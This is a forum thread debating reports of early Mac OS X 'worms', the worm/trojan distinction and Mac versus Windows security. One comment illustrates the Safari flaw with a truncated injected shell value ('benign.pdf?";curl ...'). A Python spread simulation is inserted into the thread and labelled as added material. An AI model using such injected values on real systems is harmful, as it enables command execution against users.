Computer 'Worms' Turn on Macs
Carl Bialik from WSJ writes "Macs have been largely immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Now there's a neutral party with no agenda when it comes to security!
Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
Fleur de Sel
They could report a worm or virus a day for the rest of my LIFE and they'd still have a better security record than Windows.
Macs have been largely immune to the viruses, worms and malware
Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt too secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?
Dedicated Cthulhu Cultist since 4523 BC.
Seriously, if you have to manually download the program and enter your admin password, it is not a virus or a worm. I don't know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script.
The war with islam is a war on the beast
The war on terror is a war for peace
...but I digress. Regular updates, safe web browsing, and not clicking email links should be the norm anyway regardless of operating system. Of course "safe web browsing" means different things to different people.
A virus is not a worm. If it requires you to execute it or interact with it in any way, it's not a worm.
Repeat after me: This is social engineering.
So the virus turns the computer on, even after they've been shut off? That's pretty cool.
Every reporter that misclassifies trojans and viruses as worms needs to be beaten over the head with a herring.
Worms are very different than viruses. Don't mix them up! It's not that hard!
An OS's security is directly related to its popularity. The less popular, the more secure and conversely, the more popular, the less secure. Hackers aren't gonna waste time on an unpopular OS. When's the last time you heard of a security threat for BEOS? It's not because it's secure... it's because nobody uses it.
http://religiousfreaks.com/
Windows has had what, like 200,000 viruses in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive are there, but it's just not really happening.
Most of the "worms" I've seen on Mac haven't actually been worms. They come in via safari and are disabled by unchecking a checkbox. It's not like the windows worms where they have a service that nobody uses listening on a port that is able to execute the code. And it doesn't trash the system because you don't have root access on by default.
Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
The Independent: Reverend Spooner Arrested in Friar Tuck Incident - ISIHAC, Historical Headlines
If companies like Symantec would stop making those damn viruses the world would be virus free. But then companies like Symantec would not be needed.
And if they can't make any viruses, they start making up shit about that it is not safe for users anyway.
I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.
I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?
Note that Microsoft gets critical security issues fairly often with their approach.
The recent Apple issues have been lowest rated security issues.
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.
You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
Folks don't need to worry.
Using google images as a definitive source, I tried the following searches
Microsoft worm
and
apple worm
Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.
Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)
The world will continue to turn.
liqbase
No one ever said Macs were perfect, just that they are better. It's amazing to me how there can be hundreds upon hundreds of flaws in Windows, but as soon as a token flaw is discovered in the Mac somehow Windows users feel vindicated. I suppose it's a matter of emotional self-defense - they don't want to feel bad about buying/using Windows, so the smallest Mac flaw is exaggerated.
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Well, yeah... Symantec has kind of a vested interest in gradually eroding that idea, don't they?
Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.
A computer is only as secure as its maintainer. I am running a small network at home that has a mishmash of linux and Windows computers. Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid. The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.
Just my $0.02
- Andrew
I meta-moderate because I care.
Simple math based on market share shows why malware writers haven't targeted much more than Windows (not that Windows isn't easily compromised). If you write something that has almost no chance of spreading around, or even if it does, won't do much, what's the point?
Now that Macs are getting popular, we'll see more of it... the same goes for Linux. It's simply a matter of time.
Macs are not "immune" to anything.
They are not "targeted" due to their small market share. They are also not targeted due to the fact that they keep changing OSs, processors and whatnot such that any Mac (OSX PPC, OSX x86, OS9 PPC, OS9 Moto) is a subset of an already small market share.
Windows is a huge bullseye due to its truly massive installed base. Linux will be the next target.
There are like 4 steps to protecting yourself against viruses on Macs:
1) Leave your firewall on as many ports as possible. Only open it on non-major ports when you're actually using them (it's so easy to change if you want to)
2) Block images in email and don't open DLed crap.
3) Don't run as Admin. Make a new account, check the admin box, and uncheck yours.
4) If you're super-paranoid, change the privileges to Terminal to take away everyone's access except root.
These steps literally took 3 minutes on Tiger.
I've got your "bird" right here, Symantec.
--- What?
The worms didn't appear to inflict any meaningful harm on Macs -- they required users to go through several steps on their computers before being infected.
Doesn't the fact that they require user intervention to propagate make them not worms but trojan horses? Every OS is vulnerable to those, from Irix to Windows.
...use RAID
He who knows best knows how little he knows. - Thomas Jefferson
Personally, these two "worms" for OS X don't worry me too much. They both seem to require user interaction in order to infect the system. What will really be of concern is a worm that can spread without the user being involved in any way. Personally, I think that OS X is much less likely to suffer from exploits of this type than Windows.
SIGFAULT
It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.
Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, at its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes
This is what I've been saying for a while. Really, it's kind of a self-evident thing. Let's face it, the hacker (and/or cracker) mentality is often to do things to see if/because it's possible. It's the entire point. Just like government targets have historically been more tempting because they're supposed to be more secure, the more 'impossible' it is to do something, the higher that temptation. It's about cred and skill and kung fu. And there are people that think that way that have destructive, rather than constructive aims with this. Especially given the attitudes of some Mac users. Finagle knows it ain't all of them, but honestly, there are plenty that even I occasionally wouldn't mind seeing taken down a peg or two.
Everyone (at least anyone who writes code) knows any non-trivial system is going to have bugs, and weaknesses, of some sort. Will there be a pandemic like with Windows boxen? I doubt it, but on the other hand, I also doubt that all Macs have 3 inch hypersteel plating with regenerating plasma shields and a cloaking device. Maybe that's just me, though.
Folks,
The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brouhaha when we compare Linux versus Windows, you must make a clear differentiation.
Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without IE (try reviewing a browser hijack, and see that the file explorer uses the IE render engine to see that an IE flaw is an OS flaw), and subsequent issues with IE are counted against the OS.
The issues found recently with Bluetooth OBEX and the Safari "open anything" flaw are two examples of differentiators. The OBEX flaw is, yes, a core OS issue, however, it was identified and patched two patches ago (10.4.3), Apple is no longer shipping the OS in that rev anymore. Minus one to OS security for Apple. However, Safari, an application above the core OS, had a "bad settings default" besides the overall flaw in the app. In short, both are avoidable through an alteration in settings or application of an old patch. To be surprised that the Mac is "insecure" by the press FUD is ridiculous.
Windows, as I sit on Microsoft briefings to my company each month, have not only application security issues on a predictable and regular basis (slow months in the summer and December are due to staff vacations), but because many of those apps are so tied into the core workings of the Operating System, that each new flaw opens a bigger hole that build upon each other. A standard install of XP out of the box takes 38 patches plus the two required to just upgrade to the latest version of Windows Update. WTF?! And that does even cover the OS settings needed to make it "generally" safe to put on the Internet.
I feel safe putting ANY Mac, BSD or Linux box on the net for a half hour while I patch, because, in general are most of the distributions have reasonable defaults set, but, as they stay current, it makes it much less appetizing for the latest virus, worm, or hax0r than your default XP install. As it is with big business security, you don't necessarily have to be the most secure, you just have to be less appetizing than the next guy down the row.
I'm truly sick of the news media (print, on-line, and TV) spreading unknowledgeable FUD to the masses, just because it's "something different" without recognizing why it may be different, let alone the overall truths. Remember kids, duck and cover!
Nothing to see here... move along.
Don't worry they all do
The day that I don't have to enter an admin password to modify a file in one of the root directories is the day that I start worrying about security on my Mac.
-ch
From the linked article:
A worm propagates by itself without user intervention. While at first glance it may seem that means the user doesn't have to run it in the first place, that's a common misconception. What it means is, once the program is active it is then able to spread itself via the network without user intervention. Unlike a virus, once active, merely infects files which then must be transferred to another computer from the original infected computer manually by the user.
The difference in a virus and worm is the method of propagation, not execution.
What do you mean, "very few people were taking shots at it"? The whole premise behind security in an open source system is the concept that A LOT OF PEOPLE take shots at the system.
Unix has been running on servers for years. People have been trying to chip away at the security of these machines for just as long as they have been around. Whole hacking communities were created around attacking the security of these machines. To claim that few people have attempted to usurp the security in unix and linux based machines is preposterous.
------------------
"A computer is only as secure as its maintainer. [...] Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid."
Forgive me for saying, but the only thing stupid about what you have said is your assumption. You assume that because any program MAY have holes, that every program is EQUALLY open to insecurity.
Computer 'Worms' Turn on Macs
Worst. Switch Ad. Ever.
As MS gives up its last true monopoly! ;)
I mod down so you can mod up. Your welcome.
The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result of the combination of greater security on OSX, and smaller installed base.
http://upload.wikimedia.org/wikipedia/en/thumb/4/45/Fish_Slapping_Dance.png/180px-Fish_Slapping_Dance.png
Prof. Farnsworth - "Oh a lesson in not changing history from Mr I'm-My-Own-Grandpa!"
...what turned on Macs as a sexy iPod, just waiting for it's upload.
I guess it's hard to compete with an "agressive worm".
..the definition of FUD?!
Seriously, it seems like every week that I read a slashdot article which proclaims that the days of the virus-free Mac environment are numbered, and that Mac users will soon be the number 1 target of the malware writers. It seems that if you can use the words "Mac" and "virus" ** in the same article then you're bound to get it posted on some tech news-sh^Hite. Then give it two or three days and virtually the same article will pop-up on the BBC's website with even more inflated dire warnings.
Everyone knows that Macs "could" be susceptible to malware, so why do we keep on hearing the same doom story over-and-over again? Why not wait until there is a real threat?!
Well, we know why don't we?! It's because the anti-virus / anti-spyware vendors aren't getting their fair share of money from Mac users, and so they keep banging on with their FUD!
-----
** or Trojan, malware, spyware, etc...
return 0; }
Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug ridden unsecure OS, but since everyone (or at least 90% of users) use it it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.
OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, requires more user intervention and are often limited in scope are not discussed or probably understood by most people.
putting the 'B' in LGBTQ+
Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.
.NET does solve buffer overruns (unless you make any calls into Win32 or other C code, which Microsoft makes unnecessarily difficult to do correctly), but it pushes threads even harder. Secure software has to be correct, and threaded correct software is an oxymoron. Now you've got race conditions. The only race condition I usually have to worry about in a typical Unix software package is use of tmpnam() (and every time anyone compiles a piece of software, they get warned about it).
It's not that Linux is secure. It's that Windows is *insecure*.
Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-blown web browser to view emails (which escalated any security hole in a web browser into a worm-class bug), default of no Administrator password on NT, default share all drives (but make them "invisible" to other Windows machines), design a windowing API that essentially makes local security on a computer impossible, have a system where each file has many names (which makes it damned difficult to write a secure server), encourage people to use threads (because their OS lacked copy-on-write), omit the ability to create chroot jails from their OS, run all kinds of servers by default (remember Messenger Service and the spam that you *knew* was going to happen?) allowing IP-based access and then proceed to blame sysadmins for not firewalling Windows boxes because Win machines weren't usable out of box on the Internet, bundle telnet but not ssh, and so forth.
Hmm...other goodies. POSIX places hard bounds on what calls do. Microsoft provides MSDN, which provides some examples and no guarantees. It's a tutorial, not a spec. Writing secure software when you don't have guarantees on *exactly* what a call can do or will do in future revisions of the OS is damned impossible. Because Windows isn't a very usable multi-user machine, software authors essentially ignored local security for years -- most Windows software can be attacked every way to Sunday locally (though I'll grant that this wasn't directly MS's fault). There are local security vulnerabilities in Unix software as well, but people actually *care* about them and fix them if they can find them, and don't just introduce them without a care in the world.
Secure software is correct software, and because Windows tries to guarantee binary compatibility and there is only one Windows, developers don't often look up the spec (when I code serious software under Linux, I have the C99 spec in one window and the POSIX spec in the other). It's just a matter of "well, I've passed in this invalid value and it seems to work, and it'll probably keep going". That drives me nuts. Try saying that on comp.unix.programmer, and you'll discover a higher standard.
And MS is still doing it. Okay,
Now, Microsoft provides lots of security *administration* tools. They provide a sophisticated (I'd even argue overcomplicated -- in the vein of VMS, the problem is not a lack of controls, but in users not understanding the system fully) ACL system. The rules for what exactly happens with permissions when copying files around are bonkers. Sure, most users don't care, but if you're trying to write a system that doesn't have security holes, it's a royal pain in the ass. If it takes a ton of work to figure out and write something properly, developers will just stuff a maximally-permissive ACL on something -- under Unix, you have exactly 12 bits and an owner and group to worry about, and there's the extent of your permission system.
But the problem isn't a lack of frontends and tools. It's the coding and design practices, and that's just ha
Any program relying on (nontrivial) preemptive multithreading will be buggy.
The thing the Mac does that really should be automatic in Windows, and should be in Vista, is that it doesn't give its users full rights. Each time you do an install it requires your password, otherwise you have standard user rights, which prevent a lot of programs auto-installing. I have been using non-mac pc's for a long, long time and finally bought my first mac this month, so I am looking at everything through a Windows lens. I think the security settings make more sense on the Mac, as does the closed nature of the operating system. It leaves fewer opportunities for the end user to do something stupid, or more likely, prevents them opening up security holes by not doing something. This is probably all my fault for buying a Mac. Be warned, I just installed Linux for the first time, as well, so there is no doubt trouble on that horizon, too.
These are the same 'security experts' that were up to recently predicting that no one was writing malware for the Mac precisely because of its low userbase.
This would also be news to the Apple developers. Do these 'security experts' have any citations for this statement? Also OS X is based on bsdUnix which by default works on the least privilege model they are currently innovating into Vista.
davecb5620@gmail.com
As long as you don't go to dodgy sites you'll be fine. I was kind of shocked the other day when I looked at a Windows computer that had everything, virus protection, spyware protection, and there was a mywebsearch bar installed on _firefox_. No one knew how it got there.
In my opinion, it's stuff like this that make Windows such a hassle: not Viruses/Worms, but Spyware/Malware which target the Windows platform.
Well, until just a few weeks ago, there was nothing to scan for, except Windows viruses! So what would the point have been?
The major vendors have engines ready to scan, but things will have to get a whole lot worse and more regular before I will pay up and slow down my system with one of those bastards....
According to the Reg the OS X security exploits are largely academic and not serious threats.
For the foreseeable future Microsoft Windows will remain a huge security risk.
Developers: We can use your help.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.
All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.
Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in its address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?
In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.
In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.
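The two-cluster thought experiment in the comment above, worked through as a simulation. This is an added example, not part of the original post; the 2000-machine population, the random address books, the round-by-round mailing and the mean-field formula are assumptions made for illustration.

```python
import math
import random
from statistics import median


def build_address_books(n, k, rng):
    """Give every machine k distinct random contacts other than itself (constructed data)."""
    books = []
    for me in range(n):
        picks = rng.sample(range(n - 1), k)
        # Shift indexes at or above `me` by one so a machine never lists itself.
        books.append([p if p < me else p + 1 for p in picks])
    return books


def simulate(n, k, windows_share, rng):
    """Run one outbreak; return (rounds with new infections, share of Windows machines hit)."""
    vulnerable = [rng.random() < windows_share for _ in range(n)]
    books = build_address_books(n, k, rng)
    windows = [i for i in range(n) if vulnerable[i]]
    patient_zero = rng.choice(windows)
    infected = {patient_zero}
    frontier = [patient_zero]
    rounds = 0
    while frontier:
        newly = []
        for src in frontier:
            for dst in books[src]:
                # Mail sent to a Mac is a dead end: nothing runs, nothing is forwarded.
                if vulnerable[dst] and dst not in infected:
                    infected.add(dst)
                    newly.append(dst)
        if newly:
            rounds += 1
        frontier = newly
    return rounds, len(infected) / len(windows)


def mean_field_reach(k, windows_share, iterations=200):
    """Large-network estimate of the share of Windows machines ever reached.

    Assumption: a Windows machine escapes only if no infected machine lists it,
    which gives the fixed point s = 1 - exp(-k * share * s).
    """
    s = 1.0
    for _ in range(iterations):
        s = 1.0 - math.exp(-k * windows_share * s)
    return s


def compare(n=2000, k=5, trials=21, seed=2006):
    """Compare the all-Windows cluster with the half-Mac cluster over several runs."""
    rng = random.Random(seed)
    results = {}
    for label, share in (("all_windows", 1.0), ("half_mac", 0.5)):
        runs = [simulate(n, k, share, rng) for _ in range(trials)]
        results[label] = {
            "branching": k * share,  # average exploitable contacts per machine
            "median_rounds": median(r for r, _ in runs),
            "median_reach": median(f for _, f in runs),
            "predicted_reach": mean_field_reach(k, share),
        }
    return results


if __name__ == "__main__":
    for label, stats in compare().items():
        print(label, stats)
```

The medians are taken over several runs because in the half-Mac cluster an outbreak can die out at the first hop when the first machine's contacts are all Macs.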
Besides what Hollywood tells you in a fine movie full of suspense, real burglars break in using the easiest entrance first. That is why "Apple gets more popular => there will be more viruses" is a cheap and wrong statement.
Or for that matter, "Windows gets all the viruses because of its market dominance", sounds really funny to me.
Follow the path of the least resistance.
Even if I start a regular program on my Mac for the first time, it asks me if, since it is the first time I run it, if I really want to do that... Social Engineering on both sides of the fences!
No system is 100% safe. But some are a lot safer than others.
--------
* Sigh *
Agreed: If you want Mac malware, you have to go to a store and buy it.
It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:
"In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.
Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.
Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.
-
Cheney's company is rapidly building prisons for the U.S. government.
I wonder if/when the new intel-macs will have dual-booting abilities and you are able to install Vista, or worse XP, on them, could this make the Apple-OS more vulnerable? I'm thinking rootkit-like viruses and assuming that Vista-security could be lacking.
As a Mac user I have never had to run virus scanning software and I've never had a virus!
I also have never been to the dentist and never had a cavity but that's a different issue.
As most malware attacks are for profit these days, the Windows environment, with its huge level of insecurity provides a bigger payback for the investment of time and effort involved.
If Apple and Linux boxes were more popular - or become more popular - for desktop application systems which are connected to the Internet, they would get targeted more. But, there is a saving point here. If these systems can be properly configured and locked down so malware can't get started they will remain relatively immune. Once it gets around that Apple or Linux systems have good "as installed" security against malware, its authors will look elsewhere as criminals are just as lazy - if not more so - as everyone else, and are not going to work hard for small returns. Problem is, the settings for this will have to be done by the release maintainers as most people will probably use them 'out of the box' in whatever way the system is set up to be configured. If the Linux and Apple OS release maintainers do not design their systems to install in a secure method in the first place, (Linspire being the prime example, having the user default to root), these systems can and will become just as buggy and virus-ridden as Windows boxen have become.
Paul Robinson
paul@paul-robinson.org / paul@paulrobinson.org
The lessons of history teach us - if they teach us anything - that nobody learns the lessons that history teaches us.
Most *nix systems (including GNU/Linux, the BSDs, Mac OS X (Darwin), and Solaris (Open Solaris)) are OPEN SOURCE.
While this does nothing to guarantee immunity, it does mean that the cards are on the table, and face up. Anyone who wants to browse the source is free to do so, which often means vulnerabilities are found, and many times patched long before an exploit exists in the wild.
Contrast this with the "Microsoft" way:
No really, it's secure this time. No we fixed that! Trust us. We're focused on security. What do you mean you'd like to audit the source code? Are you in the European Union? You understand we are going to have to charge you for a peek.
Personally, I prefer the former to the latter.
While there is certainly great potential for abuse, I still believe Macs come more secure "Out of the box."
On a Mac - All the communication ports are closed and all native services -- personal file sharing, Windows file sharing, personal web sharing, remote login, FTP access, remote Apple events and printer sharing -- are turned off by default.
On XP Service Pack 2 - The Windows Firewall is enabled by default (Great!) But file and printer sharing default to on and you still have full admin on the machine by default.
In the end, Windows and "Unix flavored" OSes can both be hardened considerably by someone with the knowledge and tools to do so, but for me it always comes down to having a secure and transparent foundation and that means open source.
Full Disclosure - I admin both types of platforms in a variety of flavors but I prefer Unix to Windows so factor in my bias into the above.
HA-HA! :)
At least most reports have stopped claiming there was a virus! Here is a better URL since Commander Taco (or someone else) is about to have their WSJ account suspended. Why do these news companies try to force people to provide a password? I hate that, putting up with advertising is annoying enough. http://online.wsj.com/public/article/SB114099964776283796.html
I paid the going retail price for a Windows screen reader and got a free Unix computer!
"Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article."
Not too long ago, wasn't there a challenge about writing viruses for the MAC, while Jobs put up a bounty? Later they retracted the bounty and offer.
In a stunning change of tactics, Slashdot today began running MS FUD stories as 'real news.'
A nation mourns. (but not much)
FU Big Billy.
Can we stop using the term "PC" like that already? PC isn't a model name or an operating system; it's a form factor. PCs are smaller than servers, less powerful than workstations, and might include laptops but probably not handhelds. Most of Apple's offerings are personal computers. My computer is a "PC" in that it uses an x86 processor and shipped with Windows, but I run linux so I'm also immune to all that stuff that should be "plaguing" it. Viruses and malware are a problem on Windows (only because it's the most popular; they will target any OS that gains enough market share), not some broad hardware platform that even Apple is adopting now.
Everyone is born right-handed; only the greatest overcome it
Summary says, "two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack."
This is not true. These things were not recently discovered, they are years old, and they are not a vulnerability, but rather a stupid choice in implementation by Apple, by "Opening "Safe" files after downloading". There are no "Safe" files until a user determines they are safe, and even then, many users are not that good at determining safe and nonsafe. But they are much, much better than computers at figuring this stuff out a priori. Computers (after being told what to do) are better at post mortem stuff (anti-virus, spyware and adware removal, etc).
Oh, and Symantec of all people are reporting this?
From what I know, they are a terrible software company that make buggy "security" software whose business model is going to be taken away when Microsoft starts selling security as a service for their buggy software just like Norton utilities went away when MS started providing more robust filesystems and bundling (rebranding) some of Norton's stuff.
The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.
In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.
The only relevant part of the article comes at the very end:
Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.
Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.
That should have been the lead. The rest of the article is idiotic.
Expect more "OS X is not secure and eats babies" so just in time for Vista's launch when everybody's mulling over buying a new computer, suddenly OS X looks really insecure and spangly Vista is shilled and astroturfed to be the most secure operating system on the planet to do your online banking with.
I've said it before, I'll say it again. Mac OS X has no vectors for attack except social engineering. You will not see things like Slammer or Blaster on the Mac, as there are no ports open on a default install. None. How are you going to get in the box now, other than stupid users (which there is little you can do about)?
Mac OS X - thanks to fewer services running, no network ports open, no root user, and strong use of system permissions - presents a much smaller surface area to attack than Windows. While market share magnifies this effect for those who are writing viruses for economic gain, if the two were equally matched in terms of share, Mac OS X would still be more secure.
Next.
I don't know what kind of crack I was on, but I suspect it was decaf.
Be careful, you might disrupt the reality distortion field Apple fanboys have so diligently constructed. When a worm or virus infects Apple computers the definitions of worms and viruses must require revision.
While I was reading this newsbit, as I read past "Apple itself", in my head I actually pronounced it "Apple iTself" (with a long i). yay marketing!!
If cell phones already have 240 viruses it's considered insignificant, if the Mac gets two half-ass worms that did absolutely no damage and have to be specifically authorized by the user to trigger themselves the Mac security myth is eroded...
go figure
Nelson Munce: Haa Haa!
Posting that will get you banned on at least one Mac forum since the majority of Mac users don't have a clue as to what that does.
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this: That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http :
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
What they don't know is that the mafia run Macs with OSX ;) Obviously, there are standing orders not to allow viruses for said systems, so as to not inconvenience the bosses.
Last time I checked setting up startup item required admin password.
Correct Link.
There are a few, but these two in particular are very bad:
"Newer machines can only execute new code from emulation called Rosetta" = "Newer machines can only execute new code or old code through an emulation engine called Rosetta"
"or use techniques to lure the user to do that, and as long as it does not try to access a virus." = "or use techniques to lure the user to do that, and as long as it does not try to access low level features a virus would need."
Now that Apple is using Intel processors, does it improve the cost/benefit ratio for criminals? The argument for Apple has been not that they are better built (they may be - not trolling), but that there are fewer of them, therefore not worth the effort of writing a separate worm/virus for. Now that they use the same hardware as the more popular Windows boxes, there may be reuse of common payloads. The point of entry may still be different (different weaknesses to exploit).
I'm in my right mind and I have the answer to everything!
Don't forget that the WSJ is the home of Walter Mossberg... the ultimate (corporate) Mac fanboy. I don't think that the WSJ has ever published anything even remotely negative of the Mac in Walter's columns. Here is a case of a journalist trading access to the hottest products and inside interviews in exchange for only publishing positive reviews. Real reviewers that occasionally write bad things (tm) about Apple are banished from the A list of reporters invited. If you really write bad things (tm) about Apple your company can be banished and all of your firm's publications removed from Apple stores.
Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that are essential to the full Windows experience.
Oh well, what the hell...
Wake me up when we reach the "minor outbreak" stage.
And I still remember the good old days with Scores and CDEF and nVir.
I mean, the story posting? Is it a cron job?
